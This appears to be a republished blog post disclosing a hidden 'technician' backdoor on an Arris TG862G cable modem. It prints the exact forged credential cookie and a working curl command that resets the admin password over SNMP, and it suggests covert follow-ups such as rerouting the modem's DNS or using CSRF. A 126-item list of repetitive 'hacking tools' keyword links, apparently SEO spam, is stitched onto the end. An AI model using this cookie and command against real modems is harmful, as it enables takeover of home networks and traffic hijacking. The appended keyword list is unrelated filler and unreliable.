Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.

More info

1. Hacking Tools And Software
2. Hacker Search Tools
3. Black Hat Hacker Tools
4. Hack Tools For Windows
5. How To Make Hacking Tools
6. Hackrf Tools
7. Pentest Tools Windows
8. Pentest Tools Bluekeep
9. Hack Rom Tools
10. Pentest Reporting Tools
11. Hacker Tools Apk Download
12. Tools 4 Hack
13. Install Pentest Tools Ubuntu
14. Pentest Box Tools Download
15. Hacker Tools For Mac
16. Hacker Tools Hardware
17. Hacking Tools Windows 10
18. Pentest Tools Open Source
19. How To Install Pentest Tools In Ubuntu
20. Pentest Tools Subdomain
21. Hacker Tools Online
22. Growth Hacker Tools
23. Pentest Tools Open Source
24. Hackrf Tools
25. Hacker Tools For Mac
26. Hacker Search Tools
27. Pentest Tools Review
28. Pentest Tools Github
29. Hacker Tools For Windows
30. Pentest Tools Alternative
31. Tools For Hacker
32. Hack Tools
33. How To Install Pentest Tools In Ubuntu
34. New Hacker Tools
35. Wifi Hacker Tools For Windows
36. Best Pentesting Tools 2018
37. Hacking Tools For Mac
38. Hackers Toolbox
39. Hacker Tools For Windows
40. Hacker Tools For Pc
41. Kik Hack Tools
42. Hacking Tools For Games
43. Hacking Tools Software
44. Tools Used For Hacking
45. New Hacker Tools
46. Hacking Tools Mac
47. Pentest Box Tools Download
48. Hacking Tools For Kali Linux
49. New Hacker Tools
50. Hacking Tools And Software
51. Hacking Apps
52. Pentest Tools Nmap
53. Pentest Reporting Tools
54. Hack Tools For Games
55. Hacker Tools Online
56. Hack Tools 2019
57. Hacks And Tools
58. Hack Tools Download
59. Best Hacking Tools 2019
60. Hacker Tools
61. Blackhat Hacker Tools
62. Hack Tools Mac
63. Hacking Tools For Kali Linux
64. New Hack Tools
65. Pentest Tools Website Vulnerability
66. Hacking Tools Kit
67. Hacker Tools For Mac
68. Tools Used For Hacking
69. Hacking Tools Software
70. Pentest Tools Url Fuzzer
71. Hack Tool Apk No Root
72. Pentest Recon Tools
73. Hack Tools For Mac
74. Game Hacking
75. Hacker Security Tools
76. Hacker Tools Apk
77. Hack Website Online Tool
78. Hacker Tools Apk Download
79. Hacking Tools
80. Pentest Tools Tcp Port Scanner
81. Hackers Toolbox
82. Hacker Tools Hardware
83. What Is Hacking Tools
84. Pentest Automation Tools
85. Hacker Tools Windows
86. Hacker Tools Windows
87. Pentest Tools For Android
88. World No 1 Hacker Software
89. Hack Website Online Tool
90. Hacker Tools Apk Download
91. Beginner Hacker Tools
92. Pentest Tools Online
93. Hack Tools
94. Hacker Tools Github
95. How To Install Pentest Tools In Ubuntu
96. How To Make Hacking Tools
97. Wifi Hacker Tools For Windows
98. Bluetooth Hacking Tools Kali
99. Pentest Tools Linux
100. Pentest Tools Framework
101. Hacking Tools Name
102. Hacking Tools For Windows
103. Termux Hacking Tools 2019
104. Easy Hack Tools
105. Hacker
106. Ethical Hacker Tools
107. Hack Tool Apk No Root
108. Kik Hack Tools
109. Hack Tools
110. Android Hack Tools Github
111. Nsa Hack Tools
112. Pentest Tools Android
113. Best Pentesting Tools 2018
114. Hacking App
115. Pentest Tools Port Scanner
116. Hacking Tools Hardware
117. Hack Website Online Tool
118. Hacking Tools 2019
119. Top Pentest Tools
120. Tools Used For Hacking
121. Hacking Tools Kit
122. Pentest Tools Port Scanner
123. Nsa Hack Tools Download
124. Usb Pentest Tools
125. Hacking Tools And Software
126. Hack Tools Pc